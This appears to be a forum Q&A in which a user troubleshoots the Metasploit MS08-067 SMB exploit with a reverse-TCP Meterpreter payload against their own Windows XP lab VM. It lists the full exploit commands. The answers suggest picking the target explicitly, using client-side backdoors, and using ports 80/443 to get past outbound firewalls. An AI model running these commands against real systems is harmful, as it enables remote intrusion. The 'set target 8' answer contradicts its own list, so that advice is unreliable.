0

I am trying to hack my own webcam. My host PC is Linux Mint 17. The target is VM instance of Windows XP SP3. Target IP - 192.168.1.6 My Host IP - 192.168.1.8

Problem is when i execute exploit, it says attempting to trigget the vulnerability and nothing happens. Attached is the snapshot: Img link https://i.stack.imgur.com/EiPlr.png

Here are the commands i am using:

use exploit/windows/smb/ms08_067_netapi    
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.8
exploit

enter image description here

kishorer747
  • 810
  • 1
  • 10
  • 24

3 Answers3

0

Looks like you want to open a metertpreter session. Assuming this, here is one suggestion.....

Try to issue "show targets" commands and set your O.S as target, explicitly. eg:show targets output might be something like.... Exploit targets:

Id Name


0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX) then issue command as....

set target 8

Then issue "exploit" command.

Then check if meterpreter console opens.

Pooja
  • 136
  • 4
0

in most of the time windows targets are patched and you can not attack them with this exploit. but you can use some client side exploit like: browse base exploit backdoor executable and ...

Omid Goudazi
  • 120
  • 2
  • 9
0

You might try different LPORT. Try using LPORT 80 which usually works. If it does not try LPORT 443. This may be because of Outbound firewall rules.

K2M
  • 379
  • 1
  • 5
  • 12